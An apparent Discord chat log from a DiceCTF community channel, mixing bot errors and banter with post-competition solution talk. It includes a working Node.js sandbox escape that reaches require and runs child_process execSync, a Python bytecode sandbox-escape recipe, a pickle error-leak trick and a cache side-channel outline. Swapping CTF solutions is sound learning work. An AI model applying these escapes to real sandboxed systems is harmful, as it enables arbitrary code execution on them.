#misc
coool
r/me_irl
wow defund doesn't even feel morally supported by me
just be DRS and crush everyone's dreams with taxes
π
i'm moral unsupport π
so tester cool
and support ticket closer
lmaoo
cypat blue team nerd that closes all easy vulns in pwn?
Thank you for your ticket. If there is nothing further, please use /close to close this ticket. Goodbye and good luck!
ack im only 200 qubits of stuff away ahhhh
I think defund means solve challenges in the context of actually doing a ctf
not hosting dicectf
/close
but I guess I did playtest breach
ohhh i c cool
channel still here lies
There are no questions in DiceCTF
@lean wasp I believe you have some enforcement
ack wat
!q 939595934914969631
π« Failed to parse the message param: Found the channel, but not the message. Did it get removed or is it in a channel I can't read messages from?
π§ Command usage: ![quote|q] <message>
fasdfasdf
My team is going to kill me after this
!q 805962849872117781 939595934914969631
π« Failed to parse the message param: I'm sorry but I have no clue where you want me to go look for a message with that info. Please try again by providing me the info in one of the following formats:
- <jumplink> (can be acquired by clicking 'Copy Message Link' in the right click menu of a message),
- <messageid> (only works if that server has edit logs enabled) or
- <messageid>-<channelid> (can be acquired by holding shift when clicking 'copy id' on the message menu)
π§ Command usage: ![quote|q] <message>
asdfhiuasdfjoisdajfasdiofjasoifjas
Since I didn't get any crypto
!q 939595934914969631-805962849872117781
π« Failed to parse the message param: The specified channel doesn't exist, you either gave me an invalid channel ID or it was deleted.
π§ Command usage: ![quote|q] <message>
...
lmaoo
barge is actually trolling me
!q 767776595099385876 hi
π« Failed to parse the message param: I'm sorry but I have no clue where you want me to go look for a message with that info. Please try again by providing me the info in one of the following formats:
- <jumplink> (can be acquired by clicking 'Copy Message Link' in the right click menu of a message),
- <messageid> (only works if that server has edit logs enabled) or
- <messageid>-<channelid> (can be acquired by holding shift when clicking 'copy id' on the message menu)
π§ Command usage: ![quote|q] <message>
!q hi
π« Failed to parse the message param: I'm sorry but I have no clue where you want me to go look for a message with that info. Please try again by providing me the info in one of the following formats:
- <jumplink> (can be acquired by clicking 'Copy Message Link' in the right click menu of a message),
- <messageid> (only works if that server has edit logs enabled) or
- <messageid>-<channelid> (can be acquired by holding shift when clicking 'copy id' on the message menu)
π§ Command usage: ![quote|q] <message>
what are you even trying to quote lmao
I feel like I should be only a few qubits away but I didn't set up any prints in my qasm so idk
sadge
Ireland with psychological fear, ik how to optimize the code but then ireland prob made it so you can't
[Jump to message](#rev message)
!q 805962849872117781-939596708801835018
why does barge just not know the misc channel exists
[Jump to message](#misc message)
Wat
wtf
it knows
Maybe the bot cant read deleted stuff
one sec
!q 805962849872117781-939596945440243712
π« Failed to parse the message param: Found the channel, but not the message. Did it get removed or is it in a channel I can't read messages from?
π§ Command usage: ![quote|q] <message>
lmao
ok whatever I'm pretty sure barge has message logs of deleted messages that it can quote from
!q 939596027432935504
[18:59:09] π Message 939595934914969631 by Quasar#0147 (767776595099385876) in #misc has been removed. (21 seconds after being sent)
Content: __hi
Attachment: https://cdn.discordapp.com/attachments/805962849872117781/939595934311002142/Screenshot_2022-02-05_at_11.58.40_AM.png
[Jump to message](#message-logs message)
good enough
π« You don't have permission to read that message.
lmao
oh
Well I gtg to some quantum
Ireland is prob like 300 years ahead of our time
an admin for sober-bishop?
Open a ticket #create-ticket
i'm a python noob XD
what's the intended solution of Vinegar?
guess each character by comparing error message?
isn't this TI-1337 Silver Edition?
Lol, yeah
Too tired π
Some manual work trying to get errors messages etc to leak everything
Can't see any writeup as yet
essentially this yeah
working backwards seems easiest, by setting up the pickle stack in a certain way you can bring down most character options to one or two
for example, the 6th character from the back leaks the last 4 characters of the flag in the form of an error message
Interested to see if anyone found a smarter solution for Sober Bishop? Mine takes about 30 seconds to run on 4 cores
I use BFS plus guessing 2 characters, takes 10 seconds
My solution was to explore each position from the start and backtrack if a point was visited too many times
Sped up by preloading dice{ ofc
about vinegar:
send(b"U" + pos + b"\n")
# result near the end: Memo value not found at index 959525424
# memo happens with j (which then has 4 bytes of index => 959525424 == 0219)
# Congratulations, you just leaked the last 5 bytes of the flag: j0219
is using stacktrace the intended way to get arguments on undefined?
undefined is in the author writeups
sorry, didn't see it π
my soln finds all collisions in 25s on a single core
What's the full flag for vinegar? I got to about here-ish before going insane
# 12345678901234567890
# \ndice{buh2Pdj0219__}
# ..?.??.....??}
`dice{buh2Qdj0219}`
Ah, that's pretty interesting. Nice one
ouch, I thought there were more chars π¦
once you got that "truncated" error you would know that you're out of chars
so any wp of vinegar and TI-1337 Silver Edition
@lean wasp
vinegar, figure it out from the error messages you get if you try to use the flag as unpickling instructions (and data)
TI-1337:
- functions builds are stripped not illegal, so you can get a code object with some stack massaging
c = (lambda x: eval(x), lambda x: eval(x))[0] - You could call gift through CALL_METHOD: gift.f = gift; gift.f(gift, "__code__", c) - then gift still refers to the proper builtins, so you get full regular code exec in that eval
I've always wanted to make a v8 stacktrace challenge
but eventually I realized that
v8 stacktrace api is basically a more annoying version of arguments.callee.caller
I haven't found a use case for stacktrace api beyond that
maybe you could use it to leak code length in an eval? idk kinda contrived and you could probably just parse the error message anyway
(btw the stacktrace api also doesn't give access to callers in strict mode so not even that is an advantage)
any wp for Cache On The Side?
The solution boils down to this: allocate an aligned map chunk in the same way as victim.c and measure timings for memory accesses for different values of c - the one that is slower corresponds to the flag's character (reducing WAYS_MAX to 8 helps). This way allows recovering the lower 6 bits of each character, because the Skylake L1 cache has 64 associativity sets. Now there are up to two meaningful possible values for each, so you can make an educated guess about what the flag is:
dice{31$%-#(!./V3,3_702+_2_73,1}
dice{s1de-chan/V3ls_w0rk_2_w3l1}
thank you
seems like a prime+probe attack? Is exploit source code available?
I tried writing one, but it didn't work
yeah, it is just a more complicated version of arguments.callee.caller
// Recover the real TypeError constructor by forcing a TypeError
try {
    null.f()
} catch (e) {
    TypeError = e.constructor
}
// Recover the other builtins from literals / the prototype chain
Object = {}.constructor
String = ''.constructor
Error = TypeError.prototype.__proto__.constructor

// Capture a structured (CallSite object) stack trace instead of the usual string
function CustomError() {
    const oldStackTrace = Error.prepareStackTrace
    try {
        Error.prepareStackTrace = (err, structuredStackTrace) => structuredStackTrace
        Error.captureStackTrace(this)
        this.stack // triggers prepareStackTrace and stores the CallSite array
    } finally {
        Error.prepareStackTrace = oldStackTrace
    }
}

function trigger() {
    const err = new CustomError()
    console.log(err.stack[0])
    // Walk every frame and inspect the (non-strict) caller's arguments
    for (const x of err.stack) {
        const fn = x.getFunction()
        console.log(String(fn).slice(0, 200))
        console.log(fn?.arguments)
        console.log('='.repeat(40))
        const args = fn?.arguments
        if (args?.length > 0) {
            // the module wrapper's second argument is require
            const req = args[1]
            console.log(req('child_process').execSync('id').toString())
        }
    }
}
trigger()
Here's mine (requires a lot of manual postprocessing of the results though): https://gist.github.com/winger/06149f119701bb84641db533903fd12f
Thanks
I will be publishing my writeup by tomorrow. Ping me if I forget and you want to see it.
It is possible to get the exact character every time, as the cache has 1024 sets. So you could get 10 bits of information, but obviously the victim wasn't sending any values that large.
L2_TOTAL_LINES: 16384 = L2_SIZE / (bytes/line=64)
L2_TOTAL_SETS: 1024 i.e. # of indexes = L2_TOTAL_LINES / (associativity=16)
Oh, I didn't consider the L2 cache in my solution π And for some reason I wasn't able to distinguish between the characters with the same 6 lower bits in my experiments either
Curious to know why nobody else solved 5dfs. Were people just put off by go lol?
I thought the challenge was actually quite cool, even if a typo made it very easy to exploit
poortho threatened to clown on people who cheesed
π€‘
π
that works because 2 hyperthreads share the same cache?
Which tool or script was used to automate the solving process of slime bishop
@tame bolt here's one
There's no tool afaik, it's just about implementing an algorithm that can find the flag
https://gist.github.com/wiresboy/a1ccfb4dcfd3957630176e2b58884973
LMK if you have any questions
(It also might be slightly overkill, the exact form of the challenge morphed as I was writing it so some optimizations I made may no longer matter. But I think I removed most of that weirdness already)
For undefined I had a way to reach the node TTY class (via console._stdout somewhere), and some other classes from builtin node modules, was thinking for a while if there's anything that can be exploited to read files... didn't work out, but there might be potential for another CTF challenge in that
Next year TI-1337 Color Edition?
π π π
?
well it was fun watching the suffering/fun collection of zero days proving dice is better than pb
color edition was already a thing last year :p
i am starting to struggle with names
TI-73 Explorer
Hmm maybe it's time for the TI 74 series
TI-77135
TI-1337 revenge
@lean wasp time for the ti-31337 series